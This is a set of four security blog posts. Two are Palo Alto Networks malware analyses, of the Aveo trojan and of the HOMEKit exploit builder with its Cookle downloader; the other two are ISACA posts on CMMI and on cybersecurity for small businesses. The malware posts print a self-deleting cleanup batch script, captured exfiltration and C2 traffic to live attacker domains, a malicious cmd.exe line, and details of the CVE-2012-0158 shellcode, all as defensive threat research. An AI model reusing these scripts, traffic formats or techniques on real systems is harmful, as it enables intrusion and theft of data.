Building Capability with CMMI
CMMI Models
CMMI, or Capability Maturity Model Integration, provides a solution to increasing capability gaps. Proven effective in organizations and governments globally over the last 25 years, CMMI consists of collected best practices designed to promote the behaviors that lead to improved performance in any organization. CMMI’s pathway to capability improvement can be customized with 3 models for different environments:
- CMMI for Development: Build capability when engineering or developing products and services.
- CMMI for Acquisition: Build capability when acquiring products and services.
- CMMI for Services: Build capability when providing services.
These models provide a framework for developing, improving and sustaining business performance in your environment. They enable you to determine if your current way of doing things is working, if you’re improving, and they lead you toward greater continuous improvement.
CMMI Maturity Levels
A key component to capability improvement is CMMI’s maturity levels. Maturity levels provide a rigorous benchmark rating method that enables you to compare your organization’s capability to its competitors, its industry and itself over time. CMMI provides 5 maturity levels that demonstrate a visible path for improvement: Initial, Managed, Defined, Quantitatively Managed and Optimizing.
As an organization advances its capabilities, it can expect to achieve a higher maturity level by identifying areas of improvement, working to correct these areas and integrating these solutions across its organization. High-maturity organizations have both lower risk and increased quality. The higher the organization’s maturity, the better its performance. By achieving a high CMMI maturity level, an organization demonstrates a deeper commitment to improving capabilities using statistical and other quantitative methods. A focus on continuous improvement means that high-maturity organizations are constantly evolving, adapting and growing to meet the needs of stakeholders and customers.
CMMI Around the World
Thousands of organizations have implemented CMMI; in 2015 alone, more than 1,900 high-performing organizations earned a CMMI maturity level rating. By implementing CMMI and communicating their maturity level to stakeholders, organizations highlight their capability and commitment to excellence.
CMMI has been implemented in 101 countries around the world, with 11 governments investing in CMMI to support economic development in their countries. For over 25 years, high-performing organizations in a variety of industries, including aerospace, finance, health care, software, defense, transportation and telecommunications, have earned a CMMI maturity level rating and proved they are capable business partners and suppliers.
In early 2016, ISACA acquired CMMI® Institute. ISACA and CMMI Institute share a vision for advancing organizational performance that centers on driving excellence in the IT, information systems governance, data management governance, software, and systems engineering functions in organizations across a spectrum of industries.
Learn about organizations who have implemented CMMI to improve their capability: http://cmmiinstitute.com/who-uses-cmmi.
Get Started
Ready to dive in? Download a model to get started:
For a deeper dive, the CMMI Institute offers several training courses and certification options. Elect for onsite training or take the online introductory Fundamentals of CMMI Elearning course from the comfort of your own home or office. Learn more about your CMMI training and certification options: http://cmmiinstitute.com/grow-your-career.
About CMMI Institute
CMMI Institute is the global leader in the advancement of best practices in people, process and technology. The Institute provides the tools and support for organizations to benchmark their capabilities and build maturity by comparing their operations to best practices and identifying performance gaps. Learn more: http://cmmiinstitute.com/.
Editor’s note: ISACA will be hosting a free webinar on the topic, ISACA Presents: Building Capability with CMMI, Wednesday, 17 August 2016, 12PM (EDT) / 11AM (CDT) / 9AM (PDT) / 16:00 (UTC).
1 McKinsey & Company, “Building Capabilities for Performance,” 2014
Sheela Nath, Business Writer, CMMI Institute
[ISACA Now Blog]
Aveo Malware Family Targets Japanese Speaking Users
(This blog post is also available in Japanese.)
Palo Alto Networks has identified a malware family known as ‘Aveo’ that is being used to target Japanese speaking users. The ‘Aveo’ malware name comes from an embedded debug string within the binary file. The Aveo malware family has close ties to the previously discussed FormerFirstRAT malware family, which was also witnessed being used against Japanese targets. Aveo is disguised as a Microsoft Excel document, and drops a decoy document upon execution. The decoy document in question is related to a research initiative led by the Ido Laboratory at the Saitama Institute of Technology. Upon execution, the Aveo malware accepts a number of commands, allowing attackers to take full control over the victim machine.
Deployment
The Aveo malware sample disguises itself as a Microsoft Excel document, as the icon below demonstrates. Note that the filename of ‘malware.exe’ is simply a placeholder, as the original filename is unknown.
The executable is in fact a WinRAR self-extracting executable file, which will drop the decoy document and Aveo Trojan upon execution. The following decoy document is dropped and subsequently opened when run.
Figure 2 Decoy document used with Aveo malware
This decoy document is hosted on the Ido Laboratory and contains information about a 2016 research initiative. The document lists participants in the 16th CAVE workshop, including names, affiliations, and email addresses of those involved. The document, written in Japanese, as well as the filename of this document, “CAVE研究会参加者.xls”, indicates that this malware was used to target one or more Japanese speaking individuals. Additionally, the similarities between the Aveo and FormerFirstRAT malware families, which will be discussed later in the post, further add evidence that Japanese speakers are being targeted.
Infrastructure
The Aveo Trojan is configured to communicate with the following domain name over HTTP.
- snoozetime[.]info
This domain was first registered in May 2015 to ‘jack.ondo@mail.com’. Since that time, it has since been associated with the following three IP addresses:
- 104.202.173[.]82
- 107.180.36[.]179
- 50.63.202[.]38
All IP addresses in question are located within the United States.
Figure 3 PassiveTotal screenshot showing associated IP addresses with snoozetime[.]info
The WHOIS information for snoozetime[.]info lists a registrant email address of ‘jack.ondo@mail[.]com’ and a name of ‘aygt5ruhrj aygt5ruhrj gerhjrt’. Pivoting off of these two pieces of information to domains that share the same yields the following additional domains and email addresses.
- bluepaint[.]info
- coinpack[.]info
- 7b7p[.]info
- donkeyhaws[.]info
- europcubit[.]com
- jhmiyh.ny@gmail[.]com
- 844148030@qq[.]com
Malware Analysis
After running the self-extracting executable, a number of files are dropped to the file system and the following execution flow is witnessed:
Figure 4 Malware execution flow
When the mshelp32.exe executable runs, it begins by reading in the setting32.ini file, which contains the name of the decoy document. This information is used to build a batch script, such as the following.
|
1
2
3
4
5
6
7
|
@echo off
copy “CAVE研究会参加者.xls” “C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls” /Y
del “CAVE研究会参加者.xls” /F /Q
del mshelp32.exe /F /Q
del setting32.ini /F /Q
del “C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe” /F /Q
del %0 /F /Q
|
This batch script is executed within a new process, and acts as a simple cleanup script that runs after Aveo and the decoy document are executed.
Aveo Malware Family
The Aveo malware initially runs an install routine, which will copy itself to the following location:
- %APPDATA%\MMC\MMC.exe
If for any reason the %APPDATA%\MMC directory is unable to be created, Aveo will use %TEMP% instead of %APPDATA%.
After the malware copies itself, it will execute MMC.exe in a new process with an argument of the original filename. When executed, if this single argument is provided, the malware will delete the file path provided.
After the installation routine completes, Aveo will exfiltrate the following victim information to a remote server via HTTP.
- Unique victim hash
- IP Address
- Microsoft Windows version
- Username
- ANSI code page identifier
This information is exfiltrated to the ‘snoozetime[.]info’ domain, as seen in the following example HTTP request:
|
1
2
3
4
5
|
GET /index.php?id=35467&1=ySxlp03YGm0–&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ–&6=yipl9g— HTTP/1.1
Accept: */*
User–Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache–Control: no–cache
|
To encrypt the provided data, the malware makes use of the RC4 algorithm, using a key of ‘hello’. As shown in the following image, the encryption routines between Aveo and FormerFirstRAT are almost identical, with only the algorithms and keys being changed.
Figure 5 Comparison of encryption function between Aveo and FormerFirstRAT
In order to decrypt the data provided via HTTP, the following code may be used:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
import base64
from binascii import *
from struct import *
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt
CALG_RC4 = 0x6801
CALG_MD5 = 0x8003
def decrypt(data):
md5_hasher = CryptCreateHash(CALG_MD5)
CryptHashData(md5_hasher, ‘hello’)
generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)
decrypted_data = CryptDecrypt(generated_key, data)
return decrypted_data
for a in ‘index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A–&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g–‘.split(“&”)[1:]:
k,v = a.split(“=”)
decrypted = decrypt(base64.b64decode(v.replace(“-“,“=”)))
print “[+] Parameter {} Decrypted: {}”.format(k, decrypted)
|
Running the code above yields the following results:
|
1
2
3
4
5
|
[+] Parameter 1 Decrypted: e8836687
[+] Parameter 2 Decrypted: 172.16.95.184
[+] Parameter 4 Decrypted: 6.1.7601.2.1
[+] Parameter 5 Decrypted: Josh Grunzweig
[+] Parameter 6 Decrypted: 1252
|
After the initial victim information is exfiltrated, the malware expects a response of ‘OK’. Afterwards, Aveo will spawn a new thread that is responsible for handling interactive command requests received by the command and control (C2) server, as well as requests to spawn an interactive shell.
Aveo proceeds to set the following registry key to point towards the malware’s path, thus ensuring persistence across reboots:
HKCU\software\microsoft\windows\currentversion\run\msnetbridge
A command handler loop is then entered, where Aveo will accept commands from the remote C2. While the Aveo malware family awaits a response, it will perform sleep delays of randomly chosen intervals between 0 and 3276 milliseconds. Should the C2 server respond with ‘toyota’, it will set that interval to 60 seconds. Aveo accepts the following commands, shown with their associated function.
- 1 : Execute command in interactive shell
- 2 : Get file attributes
- 3 : Write file
- 4 : Read file
- 5 : List drives
- 6 : Execute DIR command against path
The following example request demonstrates the C2 server sending the ‘ipconfig’ command to the Aveo malware.
C2 Request
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
GET /index.php?id=35468&1=niBo9x/bFG4– HTTP/1.1
Accept: */*
User–Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache–Control: no–cache
HTTP/1.0 200 OK
Content–Type: text/html; charset=utf–8
Content–Length: 11
Server: Werkzeug/0.11.10 Python/2.7.5
Date: Wed, 10 Aug 2016 16:00:11 GMT
\xca89\xb4J\x82B?\xa5\x05\xe8
[Decrypted]
1 ipconfig
|
Aveo Response
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
POST /index.php?id=35469&1=niBo9x/bFG4– HTTP/1.1
Accept: */*
User–Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Content–Length: 1006
Cache–Control: no–cache
\xca\x38\x39\xb4\x4a\x82\x42\x3f\xa5\x05\xe8\xdb\xda\x74\x8b\x79\x39\x46\xf2\x42\x1f\xcd\x39\xf3\x65\x1d\xda\x49\x40\x6c\x5e\x6e\xab\x79\xc2\x44\xc3\xb0\x12\xfd\xe2\x84\x67\x0d\xa5\xd3\x50\x2d\x1c\x31\x4a\x9e\xcb\x3d\x08\xe6\x1b\x04\x85\xbf\x11\x0e\x96\x63\xcf\x71\xfe\xe4\x97\x2a\xdc\x12\x23\x4d\xcb\x0f\x93\x30\xbc\xa0\xc8\x4e\x4e\xd8\xdb\x33\xa2\xbe\xff\x5e\x89\x22\xb9\x16\xd1\xf0\x60\x71\x64\x7a\x10\xb8\x78\x76\xe5\x08\x90\x46\x30\xa3\xe2\x4e\xdc\x98\x11\x27\x62\x38\x00\xb4\x54\x6d\xd7\x5b\x19\x5f\x19\xb8\xd1\xf5\xc1\x9b\x97\xda\x84\x2c\xdd\x2d\x97\x0a\x69\x51\xd9\x31\x77\x4a\xe2\x7f\x5e\xc5\xaf\x02\x3c\x69\x9c\x5f\x94\x3e\x0c\x25\xce\x63\xa9\x43\xff\x34\x25\x42\x95\xa9\x1f\xaa\xdf\x2b\xa7\xb1\xc0\x3
[Truncated]
[Decrypted]
1 ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection–specific DNS Suffix . :
[Truncated]
|
Conclusion
Aveo shares a number of characteristics with FormerFirstRAT, including encryption routines, code reuse, and similarities in C2 functionality. Aveo is far from the most sophisticated malware family around. As witnessed in the previously discussed FormerFirstRAT sample, this related malware family also looks to be targeting Japanese speaking users. Using a self-extracting WinRAR file, the malware drops a decoy document, a copy of the Aveo malware, and a cleanup script.
Palo Alto Networks customers are protected from this threat in the following ways:
- An AutoFocus tag has been created to track and monitor this threat
- WildFire classifies Aveo samples as malicious
- C2 domains listed in this report are blocked through Threat Prevention.
Indicators of Compromise
SHA256 Hashes
9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2
8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d
C2 Domains
snoozetime[.]info
Registry Keys
HKCU\software\microsoft\windows\currentversion\run\msnetbridge
File Paths
%APPDATA%\MMC\MMC.exe
%TEMP%\MMC\MMC.exe
Josh Grunzweig and Robert Falcone
[Palo Alto Networks Research Center]
No Small Matter: Securing the Digital Economy for Enterprises of Any Size
Every day, in every corner of the world, at every minute, small- and medium-sized enterprises (SMEs) are opening up stores, serving clients, delighting customers (or not). And while the classic SME picture may be the storefront, SME reality means constant commerce, updating web presences to buy, sell and service everything; work that begins before dawn and ends long after night has fallen.
While precise measurements are difficult due to differing definitions of SMEs, research by the World Bank has indicated that these vital enterprises employ more than half of all private sector workers globally, and can comprise more than 90% of all the world’s existing businesses. In the United States alone, the U.S. Small Business Administration has estimated that the number of SMEs currently operating in America exceeds 28 million firms.
These entrepreneurs and service sector employees share common characteristics—incredible dedication, a belief that what they do is valued by their communities, and the hope that their hard work will adequately provide for their families, and their families’ futures.
Regrettably, however, many SMEs have something else in common—minimal or nonexistent protection from cyber threats and attacks.
Effective cybersecurity is paramount to the success of any business, regardless of size, as it pursues growth and prosperity within a global and increasingly digital marketplace. According to global estimates released by security company Symantec, spear-phishing attacks against SMEs have more than doubled in only a few brief years, rising from 18% in 2011 to 43% in 2015.
For some SMEs, though, this digital economy brings with it some difficult choices. A number of SMEs around the world find themselves in the unwelcome situation of being forced to choose between incorporating adequate cybersecurity into the digital and wireless aspects of their business, or not doing so. All too often, due to business or personal factors, SMEs choose the latter.
This may not be possible in the future. As our digital economy evolves, a lack of cybersecurity for an SME poses increasing risk. Cyber insurance, available and in use by larger-scale organizations, should be more of an option for, and optimized by, SMEs. More direct impacts, such as breaches of an SME’s digital infrastructure leading to the release of financial or personal information, or attacks that create a back door into another company, will have consequences. Minimally, this hurts reputations and relationships, as customers and vendors think twice before patronizing the SME again. On the other side of the spectrum, the business does not recover, and is shuttered. None of this bodes well for SMEs that lack effective and robust cybersecurity.
There are efforts underway to address this. New Jersey’s recently appointed CTO, David Weinstein, is creating a resource for New Jersey’s SMEs to keep abreast of developments in both cybersecurity and the threat landscape, an effort that complements the ongoing cybersecurity education efforts of the U.S. Small Business Administration. We see an increasing number of Information Sharing and Analysis Centers (ISACs) in the United States making similar resources available to SMEs within their respective industries. In the European Union, ENISA is leading efforts to ensure that the knowledge gleaned from ISACs finds its way to the SME community as well. All of these efforts are commendable, for they provide SMEs with valuable tools to aid them in ensuring the cybersecurity of their digital businesses.
Yet, these efforts have not and will not reach every SME. Leaving one business or agency behind in the quest for greater cybersecurity for their digital enterprise efforts is unacceptable. The aforementioned efforts, already underway, must be built upon. Chambers of Commerce at the local, regional and national levels must begin to offer resources to secure the digital business of SMEs. More ISACs need to become involved. Governments, at all levels, need to find additional ways to create and support efforts that will aid in securing the digital futures of SMEs.
ISACA’s global community must do its part, as well. We know some ISACA chapters have begun outreach to local SMEs. This is excellent and to be commended—but efforts must grow. We urge all ISACA chapters reach out to local, regional and national SME-focused organizations, and to partner in efforts to increase and enhance cybersecurity within this crucial sector of the digital economy.
Likewise, we urge our colleagues within the NGO community to engage in similar efforts; and we pledge to help you with subject-matter expertise, tools and experience. Several NGOs have already taken steps to aid the SME community, all admirable efforts. Taken in sum, the NGO cybersecurity community has presences in nearly every nation in the world; our non-profit sector has an opportunity to effect global, positive change within the SME sector, as well as within the wider international digital marketplace.
It is incumbent, upon all of us within ISACA and with the wider NGO community, to share our expertise with the SME community. Enterprises of all sizes can and will benefit markedly from this interaction, and will be further empowered to realize the positive potential of technology, and reap the benefits of security in our evolving global digital economy.
Matthew S. Loeb, CGEIT, FASAE, CAE, Chief Executive Officer of ISACA
[ISACA Now Blog]
Fresh Baked HOMEKit-made Cookles – With a DarkHotel Overlap
Threat actors tend to reuse certain tools, a trend we observed during recent Unit 42 research published on MNKit. In this post, we will discuss a fresh toolkit, which on the surface, appeared similar to MNKit, but functionally was found to be quite different.
This toolkit, which we named “HOMEKit”, is similar to MNKit in that it is also designed to generate weaponized Microsoft Word documents containing an exploit for CVE-2012-0158, but it uses OLE instead of MHTML files. In addition, we have been able to track the use of HOMEKit by its operators since 2013 across a variety of campaigns, using several different variants of the toolkit. For this post, we will be focusing on the most recent example of the HOMEKit toolkit, in addition to an interesting overlap we discovered with the well-known attack campaign DarkHotel. In a follow-up post, we will discuss the other campaigns associated with HOMEKit, along with other variants of HOMEKit that we discovered.
In addition to analysis of HOMEKit, we will also examine a new payload we discovered embedded in one of the malicious documents created by HOMEKit, which we have named “Cookle.” It is a fairly simple downloader tool, but until now has not been publicly discussed. Cookle deploys some interesting tactics to obfuscate its activity.
Telemetry
In late June 2016, we collected an e-mail file (Figure 1) that appeared to carry a phishing attack with a malicious file attached. The sender address was spoofed, using the identity of a coordination associate for the United Nations Environment Programme (UNEP). The content of the email seemed legitimate, using the subject line of “Pyongyang International Phonebook and Mailing lists – JUNE,” attempting to appear as a global directory for residents of the Democratic People’s Republic of Korea under UNEP. To further increase the legitimacy of the phishing attack, the threat actor copied the coordination associate’s signature block as well.
Figure 1 Phishing email carrying HOMEKit exploit file
The email contained two file attachments, a Microsoft Word document and a Microsoft Excel document. The Excel document proved to be benign, but the Word document exploited the CVE-2012-0158 vulnerability. If the victim were to open the Word document, it would silently install the Cookle Trojan, while opening a decoy document in Word (Figure 2), displaying the expected content to the victim.
Figure 2 Decoy document containing message intended for residents of Pyongyang
The benign Excel document and the Word document used as decoys both appeared to be legitimate, internal documents; the Word document containing the email addresses of all DPRK UNEP residents, along with mailing lists to use for specific topics. The Excel document contained additional contacts for other related agencies, in addition to emergency contact information for the DPRK UNEP residents. Examination of the metadata of the two files revealed the Excel document was last modified by the spoofed sender’s identity on June 22, 2016, while the decoy Word document showed the original author as the Coordination Officer in 2012, with a creation timestamp of July 19, 2012. The “last modified” field of the decoy document though revealed its true nature, showing that it was last modified on April 5, 2016, by “Windows User” indicating the decoy document was likely to be last modified by the threat actor.
By using the specific documents observed in this attack, the threat actor demonstrated that he or she may have already gained unauthorized access to some extent. Also, the contents of these internal documents show that the threat actor currently has access to data that could be further leveraged to craft additional phishing attacks at related targets.
HOMEKit
The HOMEKit toolkit creates Microsoft Word documents (OLE) that exploit the CVE-2012-0158 vulnerability. All malicious documents created by the HOMEKit toolkit have the same metadata within the SummaryInformation and DocumentSummaryInformation streams of the OLE document, as seen in Figure 3.
|
1
2
3
4
5
6
|
Author: User
Last Modified By: User
Company: HOME
Code Page: Windows Simplified Chinese (PRC, Singapore)
Create Date: 2006:09:28 17:06:00
Modify Date: 2006:09:28 17:09:00
|
Figure 3 HOMEKit Meta Data
HOMEKit creates documents designed to exploit a vulnerability within the TreeView ActiveX control, specifically the CLSID of 9368265E-85FE-11d1-8BE3-0000F8754DA1. Upon successful exploitation, the malicious document will execute shellcode to open a decoy document (~.doc) while it installs and executes a payload on the system (~.dat).
The shellcode executed by this variant of HOMEKit begins with a decryption stub that is responsible for decrypting the functional shellcode. The decryption stub uses a combination of right bit shifting (ROR 3) and an XOR operation (key of 0xAF) on each byte of ciphertext.
The functional shellcode exposed by the decryption stub starts by enumerating open file handles looking for files that have a file size greater than zero. It then reads the last 20 bytes of each file looking for the value “0xDEADFOOD” at the very end of the file to find the delivery document. Once it finds the appropriate file, it parses the last 20 bytes of the file to locate the payload and decoy document using the following structure:
To decrypt the payload and decoy, the shellcode uses an algorithm that starts from the end of the ciphertext, using the lowest byte of the initial value of “0xDEADFOOD” to XOR the first byte and then rotating the key value by 1 for each subsequent operation. The shellcode will save the payload to %TEMP%\~.dat and the decoy to %TEMP%\~.doc after the decryption routines are finished. Once the payload and decoy are saved to the system, the shellcode creates a process with %TEMP%\~.dat to execute the payload and creates a process with the following command line to open the decoy document:
cmd.exe /c dir /s %windir%\system32\*.sys&&taskkill /im winword.exe /f&dir /a /s %windir%\system32\*.msc && DOCUME~1\ADMINI~1\LOCALS~1\Temp\~.doc
When creating the processes to run the payload and open the decoy, the shellcode calls GetCurrentProcess to get a handle to the current Word process, then OpenProcessToken to access the Word process’s token. Finally, it uses this token to call CreateProcessAsUserA to run the payload and the decoy with the same context as the current Word process.
Cookle Trojan
At a high level, the payload delivered in this attack is a downloader Trojan that we are tracking as “Cookle” based on a header value in HTTP requests made by the malware.
After initial execution, the Trojan creates the mutex “LDE_160425” and copies itself from %TEMP%\~.dat to %APPDATA%\Microsoft\WindowsUpdate\~.exe. For persistence, the Trojan creates the following registry key with a path to the newly copied Trojan:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup
A majority of the pertinent strings embedded within the Trojan are encoded, which the Trojan decodes using a modified base64 decoding function that swaps the uppercase letters in the base64 alphabet with lowercase letters, and vice versa. It uses this custom base64 decoder to decode the following strings:
The Trojan contains two command and control (C2) domains within the encoded strings listed above, dyn.kaleebso[.]com and dyn.pwnz[.]org. The Trojan sets a sleep timer of 20 minutes to wait before generating and sending network beacons to the C2 servers. The initial beacon seen in Figure 4 contains a misspelled “Cookie” field that includes the same value the Trojan uses as a mutex.
Figure 4 C2 Beacon sent from Cookle Trojan
If the Trojan receives a response to this beacon from the C2 server, it runs several system commands, specifically systeminfo, tasklist, netstat /ano, and ipconfig /all. It will then take the output from those system commands and save the output to a text file in the %TEMP% folder with a filename of “<year><month><day><hour><minute><second>.tmp”. The Trojan will then send the contents of this file to the C2 server as cleartext within a HTTP POST request that will resemble the following:
Figure 5 HTTP POST request issued by Cookle that sends system information to C2 server
The C2 server will respond to this request with a command that the Trojan will parse. The Trojan’s command handler has three available commands:
Figure 6 Commands within Cookle’s Command Handler
The functionality available within the Trojan is limited, however, it allows the actor to perform system reconnaissance before delivering a secondary payload. The secondary payload is delivered via the ‘d’ command, wherein the Trojan will decrypt an executable using the XOR operation on each byte in the C2’s response with 0xA7. During the analysis period, the C2 servers did not respond with a secondary payload.
Overlap with DarkHotel
Collection of additional HOMEKit delivery documents revealed use of this toolkit by its operators since at least 2013 and most recently, late June 2016. Each of these malicious documents created by the HOMEKit toolkit installed different payloads including PlugX, Sutr, and HIMAN/Mirage, among others. As mentioned earlier, we will be publishing a follow up to this post that contains details of these prior attacks.
As part of the collected sample set, we found two documents that have a very similar structure as the delivery document used in the attack delivering the Cookle payload but with very slight variations in the exploit code. The most curious aspect of these two documents was the payload embedded in them.
Both of the additional HOMEKit samples have the same functional shellcode and install a downloader associated with the Tapaoux Trojan, a tool related to the DarkHotel threat group. We compared the shellcode embedded in the HOMEKit delivery documents with previous samples associated with DarkHotel and found striking similarities (Figure 7).
Figure 7 Comparison of notable static attributes within HOMEKit documents installing Cookle and DarkHotel
The major difference between the HOMEKit documents dropping Cookle and DarkHotel begins with the stub decrypter, as seen in Figure 7. The stub decrypter decrypts a second piece of shellcode that carries out the main functionality as mentioned previously in this post. The decryption routines themselves differ, as seen in the green highlighted instructions in Figure 8. The size of the decrypted shellcode differs between the two samples as well, as seen in the yellow highlighted “mov cx” instructions in Figure 8.
Figure 8 Comparison of stub decrypters found in the shellcode within Cookle and DarkHotel samples
Even though the size of the shellcode differs between the Cookle and DarkHotel samples, the shellcode itself is extremely similar. A simple binary difference between the two functional shellcodes result in over a 90 percent similarity. Static analysis determined that the two shellcodes resolve the same API functions and store them on the stack in the same order. Also, many identical code blocks exist between the two shellcodes that results in significant code overlap. The similarities in shellcode suggest that the author of the HOMEKit toolkit variant used to deliver the Cookle Trojan had access to the same shellcode as the HOMEKit toolkit used to install DarkHotel.
The difference between the functional shellcode that installs Cookle and DarkHotel lies in the way a process is created to execute the payload and to open the decoy document. While the difference between the two is very minor, it is worth discussing as it suggests the author of the Cookle shellcode intentionally modified the DarkHotel shellcode, possibly as an anti-analysis technique. Figure 9 shows a side-by-side comparison of the process creation functionality within the DarkHotel and Cookle shellcodes, which highlights the differences between the two (red and blue highlighted instructions and two new gray code blocks).
Figure 9 Side-by-side comparison of the shellcode dropping DarkHotel and Cookle, specifically code used to create a process
The comparison in Figure 9 shows the differences between the two functions using highlighted instructions and additional boxes, but it does not explain what the changes mean from a functionality standpoint. We will explain how the two functions go about creating a process and how they differ.
The DarkHotel shellcode first uses the GetCurrentProcess function to get a handle to the Word process, then uses OpenProcessToken and finally CreateProcessAsUserA to open the decoy and execute the payload just like the Cookle shellcode. However, the DarkHotel shellcode calls the API functions in a very straightforward manner, specifically using CALL instructions (highlighted red in Figure 9).
In contrast, the Cookle shellcode uses CALL instructions to call the GetCurrentProcess and OpenProcessToken functions, but jumps to the CreateProcessAsUserA function using a JMP instruction. To allow the use of JMP in place of a CALL, the shellcode must provide a way to return to the function that called it, as the JMP instruction does not automatically handle this like the CALL instruction. Instead, it references a specific location (top four blue highlighted instructions) and starts looking for the value “0xC3” (first gray box in Figure 9), which is the value for the instruction “RETN”. Once found, the shellcode will push to the stack so the JMP instruction can be used to call the CreateProcessAsUserA function and return to the original calling function.
The similarities between the delivery documents dropping Cookle and DarkHotel payloads suggest that both were generated by the HOMEKit toolkit, albeit using slightly different versions. The slight differences between the stub decrypters and the functional shellcode within the malicious documents hints that the actor may have used the same codebase to create a modified version of HOMEKit for use in the Cookle attack.
Conclusion
As we have highlighted several times in the past, the reuse of tools is quite common amongst various threat actor groups. Our next post will further map out the various campaigns associated with HOMEKit, along with the multiple variants discovered in the span of several years. The DarkHotel payload however, is a curious outlier in the grouping of payloads we were able to identify. It is possible that the DarkHotel threat actors were able to obtain a copy of the HOMEKit codebase somehow, or even possible that the Tapaoux Trojan was obtained by operators with access to HOMEKit. It is also possible that HOMEKit is a toolkit available to multiple threat actors, via a connected intermediary. Unfortunately, at this time, a lack of data does not allow us to come to a definitive answer. Regardless, it is yet another example of tool sharing and overlap, this time with surprising results.
- Palo Alto Networks customers are protected and can learn more via the following resources:
- All samples of this HOMEKit variant and Cookle are detected as malicious by WildFire
- All domains described in this post are classified as malicious
- HOMEKit and Cookle AutoFocus tags created
Indicators of Compromise
HOMEKit SHA256
ed676d191684fa03b2b57925fe081cf32d5d6b074637f6f2a6401dd891818752
ab7b5c35786813ed874483d388edbee3736eb6af7bc4946c41794209026eeac4
f9bf645a3a7d506136132fcfa18ddf057778d641ff71d175afd86f1a4fed7ee9
Cookle SHA256
4a5807bab603d3a0a5d36aaec75729310928a9a57375b7440298fb3f3e4a2279
Cookle C2s
dyn.kaleebso[.]com
dyn.pwnz[.]org
DarkHotel SHA256
2437d0a9cc019e33fe8306fceed99605dd5ab67a8023da65fa20b9815ec19d06
bb06bfad96535ad04a6e65a6e68f34cb51f311cae48a2ff1c305f3957b2c8a4b
DarkHotel C2s
apply-wsu.ebizx[.]net
apply.ebizx[.]net
[Palo Alto Networks Research Center]
